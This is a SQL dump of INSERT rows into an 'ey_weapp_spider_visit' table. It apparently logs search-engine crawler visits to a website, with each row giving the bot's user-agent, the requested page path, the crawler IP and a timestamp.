INSERT INTO `ey_weapp_spider_visit` VALUES ('97325', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/77_8.html', '185.191.171.11', '1661672371', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97394', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.108', '1661707029', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97395', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zbs.html', '114.119.151.153', '1661707055', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97326', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/162.html', '220.181.108.105', '1661672402', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97328', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/74.html', '66.249.79.108', '1661673480', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97393', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_4/', '185.191.171.10', '1661706916', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97327', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.110', '1661672996', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97329', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/125.html', '66.249.79.108', '1661673605', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97330', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/224.html', '220.181.108.155', '1661675074', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97331', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.144', '1661675076', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97332', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/411.html', '114.119.151.155', '1661675917', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97388', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/129.html', '66.249.79.110', '1661705693', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97324', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/286.html', '66.249.79.108', '1661671821', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97396', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/chs.html', '114.119.151.153', '1661707214', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97322', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/335.html', '66.249.79.112', '1661671232', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97401', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ptq.html', '114.119.151.153', '1661708155', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97402', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/468.html', '157.55.39.117', '1661708186', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97317', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/121.html', '66.249.79.108', '1661670608', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97416', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/message/', '114.119.151.153', '1661715231', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97415', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/10_4.html', '185.191.171.42', '1661714146', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98711', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.112', '1662307703', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97399', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_48/', '185.191.171.17', '1661707819', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97400', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/20.html', '114.119.151.153', '1661707988', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98715', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/82.html', '66.249.79.108', '1662311672', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97320', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/100.html', '66.249.79.110', '1661670922', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97321', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/245.html', '66.249.79.110', '1661671107', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97403', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yb.html', '114.119.151.155', '1661708548', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97404', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/wuzhou.html', '114.119.151.155', '1661708774', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97316', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.110', '1661670322', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97417', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/index.php?a=gbook_submit&c=Lists&lang=cn&m=home', '185.191.171.25', '1661715441', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97318', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/108.html', '66.249.79.110', '1661670732', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97319', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/128.html', '66.249.79.112', '1661670857', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97414', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/322.html', '66.249.79.112', '1661713609', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97405', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/dunjun.html', '114.119.151.155', '1661708954', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97411', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/429.html', '185.191.171.13', '1661711204', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97314', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xbs.html', '114.119.151.155', '1661669942', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97419', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661715793', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97315', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/466.html', '66.249.79.110', '1661669983', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97418', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/223.html', '207.46.13.213', '1661715624', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97311', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/2_5.html', '185.191.171.24', '1661669251', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97422', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/153.html', '220.181.108.92', '1661716421', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98721', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.112', '1662312270', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98723', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/218.html', '114.119.151.155', '1662312409', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97306', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/72.html', '66.249.79.108', '1661668233', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97427', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.103', '1661725002', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97309', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/228.html', '66.249.79.112', '1661668983', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97305', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yqs.html', '114.119.151.155', '1661667804', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97428', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/212.html', '116.179.32.108', '1661726238', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98774', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yp.html', '114.119.151.153', '1662339789', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98775', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/115.html', '114.119.151.153', '1662340456', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98787', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_68/', '185.191.171.34', '1662344177', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98776', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_35/', '185.191.171.45', '1662340998', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97288', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/74.html', '66.249.79.108', '1661662777', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97303', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/178.html', '66.249.79.110', '1661667110', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97430', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/479.html', '66.249.79.112', '1661728181', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97432', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.63', '1661728377', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97433', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661728607', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97287', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/55.html', '114.119.151.153', '1661662701', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97443', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661733170', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97444', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/nanling.html', '114.119.151.155', '1661733860', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97284', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/128.html', '66.249.79.112', '1661661994', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97286', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.108', '1661662276', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97445', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/108.html', '185.191.171.23', '1661734375', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98781', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/', '66.249.79.108', '1662342770', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98782', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/78.html', '220.181.108.112', '1662342902', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97282', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/124.html', '116.179.32.225', '1661661707', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97277', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_16.html', '185.191.171.22', '1661659501', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97283', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/111.html', '66.249.79.108', '1661661915', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97450', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/hangyexinwen/list_18_11/', '114.119.151.153', '1661736048', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97451', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/79.html', '116.179.32.76', '1661736056', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97271', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/467.html', '66.249.79.108', '1661657414', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97273', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/335.html', '66.249.79.110', '1661658132', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97453', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/62.html', '114.119.151.155', '1661737252', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97299', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/132.html', '220.181.108.167', '1661664383', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97300', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/108.html', '66.249.79.108', '1661664733', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97439', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/239.html', '114.119.151.153', '1661732658', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97244', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tuobengal', '66.249.79.112', '1661645819', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97237', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/262.html', '114.119.151.153', '1661643358', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97479', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661750230', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97239', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/53.html', '185.191.171.19', '1661644471', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97217', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_19/', '116.179.32.223', '1661637652', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97224', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/316.html', '207.46.13.213', '1661639936', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97212', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tuobengal/', '66.249.79.110', '1661635507', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97210', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1661632931', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97209', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_19.html', '185.191.171.16', '1661632920', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97199', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/357.html', '216.244.66.194', '1661628122', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97526', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_42/', '114.119.151.155', '1661775552', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97527', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/159.html', '116.179.32.112', '1661775575', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97206', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_19/', '185.191.171.1', '1661631368', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97511', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/180.html', '185.191.171.36', '1661765316', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97512', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/150.html', '220.181.108.176', '1661767391', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97513', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/457.html', '185.191.171.12', '1661767954', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97534', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/164.html', '66.249.79.108', '1661778327', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97184', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.166', '1661616266', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97182', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/338.html', '17.121.112.183', '1661615946', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97181', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/449.html', '66.249.79.108', '1661615125', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97178', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/159.html', '116.179.32.152', '1661612774', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97539', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/83.html', '185.191.171.15', '1661780132', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97179', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/217.html', '66.249.79.108', '1661612848', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97176', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_41.html', '220.181.108.175', '1661611955', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97540', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/90.html', '116.179.32.42', '1661780484', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97541', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_19/', '116.179.32.112', '1661781574', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97170', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_61/', '185.191.171.22', '1661610745', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97171', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/497.html', '185.191.171.5', '1661610824', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97160', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/315.html', '66.249.79.110', '1661609011', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97168', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/sx.html', '114.119.151.155', '1661610332', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97153', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/223.html', '114.119.151.153', '1661607878', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97145', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/92.html', '116.179.32.146', '1661602963', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97553', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/44_2.html', '220.181.108.146', '1661787028', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97146', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/223.html', '66.249.79.112', '1661604242', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97132', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/92.html', '220.181.108.82', '1661598791', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97148', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljwd/', '114.119.151.155', '1661606710', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97149', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/150.html', '114.119.151.155', '1661606970', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97550', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/195.html', '220.181.108.104', '1661784846', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97150', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/36.html', '116.179.32.173', '1661607046', '0');
